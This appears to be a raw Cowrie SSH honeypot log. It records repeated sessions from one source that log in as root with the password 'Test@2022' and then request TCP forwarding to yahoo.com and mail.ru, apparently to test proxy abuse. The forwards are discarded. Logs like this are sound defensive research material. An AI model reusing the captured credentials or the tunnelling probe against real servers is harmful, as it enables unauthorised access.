{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:59.367408Z","src_ip":"77.83.207.83","session":"5e2ea084db0e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":25232,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:25232","sensor":"my-vps","timestamp":"2025-08-31T03:49:59.508886Z","session":"5e2ea084db0e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:59.559678Z","src_ip":"77.83.207.83","session":"5e2ea084db0e"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:59.610954Z","src_ip":"77.83.207.83","session":"5e2ea084db0e"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":12801,"dst_ip":"1.2.3.4","dst_port":22,"session":"322e8f1842ae","protocol":"ssh","message":"New connection: 77.83.207.83:12801 (1.2.3.4:22) [session: 322e8f1842ae]","sensor":"my-vps","timestamp":"2025-08-31T03:49:59.659549Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:59.660219Z","src_ip":"77.83.207.83","session":"322e8f1842ae"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:59.710634Z","src_ip":"77.83.207.83","session":"322e8f1842ae"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:59.961282Z","src_ip":"77.83.207.83","session":"322e8f1842ae"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":16333,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:16333","sensor":"my-vps","timestamp":"2025-08-31T03:50:00.012717Z","session":"322e8f1842ae"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:00.063329Z","src_ip":"77.83.207.83","session":"322e8f1842ae"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":26442,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:26442","sensor":"my-vps","timestamp":"2025-08-31T03:50:00.205067Z","session":"322e8f1842ae"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:00.255537Z","src_ip":"77.83.207.83","session":"322e8f1842ae"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":20047,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:20047","sensor":"my-vps","timestamp":"2025-08-31T03:50:00.396515Z","session":"322e8f1842ae"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:00.446903Z","src_ip":"77.83.207.83","session":"322e8f1842ae"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:00.498841Z","src_ip":"77.83.207.83","session":"322e8f1842ae"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":12897,"dst_ip":"1.2.3.4","dst_port":22,"session":"914d20801470","protocol":"ssh","message":"New connection: 77.83.207.83:12897 (1.2.3.4:22) [session: 914d20801470]","sensor":"my-vps","timestamp":"2025-08-31T03:50:00.547640Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:00.548925Z","src_ip":"77.83.207.83","session":"914d20801470"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:00.598897Z","src_ip":"77.83.207.83","session":"914d20801470"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:00.847873Z","src_ip":"77.83.207.83","session":"914d20801470"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":12910,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:12910","sensor":"my-vps","timestamp":"2025-08-31T03:50:00.898871Z","session":"914d20801470"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:00.948853Z","src_ip":"77.83.207.83","session":"914d20801470"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":27776,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:27776","sensor":"my-vps","timestamp":"2025-08-31T03:50:01.092488Z","session":"914d20801470"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:01.142656Z","src_ip":"77.83.207.83","session":"914d20801470"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":24695,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:24695","sensor":"my-vps","timestamp":"2025-08-31T03:50:01.284608Z","session":"914d20801470"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:01.335174Z","src_ip":"77.83.207.83","session":"914d20801470"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:01.386534Z","src_ip":"77.83.207.83","session":"914d20801470"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":13007,"dst_ip":"1.2.3.4","dst_port":22,"session":"581640981a91","protocol":"ssh","message":"New connection: 77.83.207.83:13007 (1.2.3.4:22) [session: 581640981a91]","sensor":"my-vps","timestamp":"2025-08-31T03:50:01.435212Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:01.444945Z","src_ip":"77.83.207.83","session":"581640981a91"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:01.485792Z","src_ip":"77.83.207.83","session":"581640981a91"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:01.735716Z","src_ip":"77.83.207.83","session":"581640981a91"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":6360,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:6360","sensor":"my-vps","timestamp":"2025-08-31T03:50:01.787135Z","session":"581640981a91"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:01.837308Z","src_ip":"77.83.207.83","session":"581640981a91"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":21204,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:21204","sensor":"my-vps","timestamp":"2025-08-31T03:50:01.980289Z","session":"581640981a91"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:02.030169Z","src_ip":"77.83.207.83","session":"581640981a91"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":10327,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:10327","sensor":"my-vps","timestamp":"2025-08-31T03:50:02.172325Z","session":"581640981a91"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:02.222324Z","src_ip":"77.83.207.83","session":"581640981a91"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:02.273027Z","src_ip":"77.83.207.83","session":"581640981a91"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":13120,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b31cbe856e4","protocol":"ssh","message":"New connection: 77.83.207.83:13120 (1.2.3.4:22) [session: 6b31cbe856e4]","sensor":"my-vps","timestamp":"2025-08-31T03:50:02.322844Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:02.323813Z","src_ip":"77.83.207.83","session":"6b31cbe856e4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:02.374565Z","src_ip":"77.83.207.83","session":"6b31cbe856e4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:02.626064Z","src_ip":"77.83.207.83","session":"6b31cbe856e4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":12183,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:12183","sensor":"my-vps","timestamp":"2025-08-31T03:50:02.677512Z","session":"6b31cbe856e4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:02.728088Z","src_ip":"77.83.207.83","session":"6b31cbe856e4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":25557,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:25557","sensor":"my-vps","timestamp":"2025-08-31T03:50:02.868845Z","session":"6b31cbe856e4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:02.919196Z","src_ip":"77.83.207.83","session":"6b31cbe856e4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":2417,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:2417","sensor":"my-vps","timestamp":"2025-08-31T03:50:03.060929Z","session":"6b31cbe856e4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:03.111219Z","src_ip":"77.83.207.83","session":"6b31cbe856e4"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:03.162758Z","src_ip":"77.83.207.83","session":"6b31cbe856e4"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":13230,"dst_ip":"1.2.3.4","dst_port":22,"session":"812ba478bf3c","protocol":"ssh","message":"New connection: 77.83.207.83:13230 (1.2.3.4:22) [session: 812ba478bf3c]","sensor":"my-vps","timestamp":"2025-08-31T03:50:03.212168Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:03.212879Z","src_ip":"77.83.207.83","session":"812ba478bf3c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:03.264551Z","src_ip":"77.83.207.83","session":"812ba478bf3c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:03.515942Z","src_ip":"77.83.207.83","session":"812ba478bf3c"}
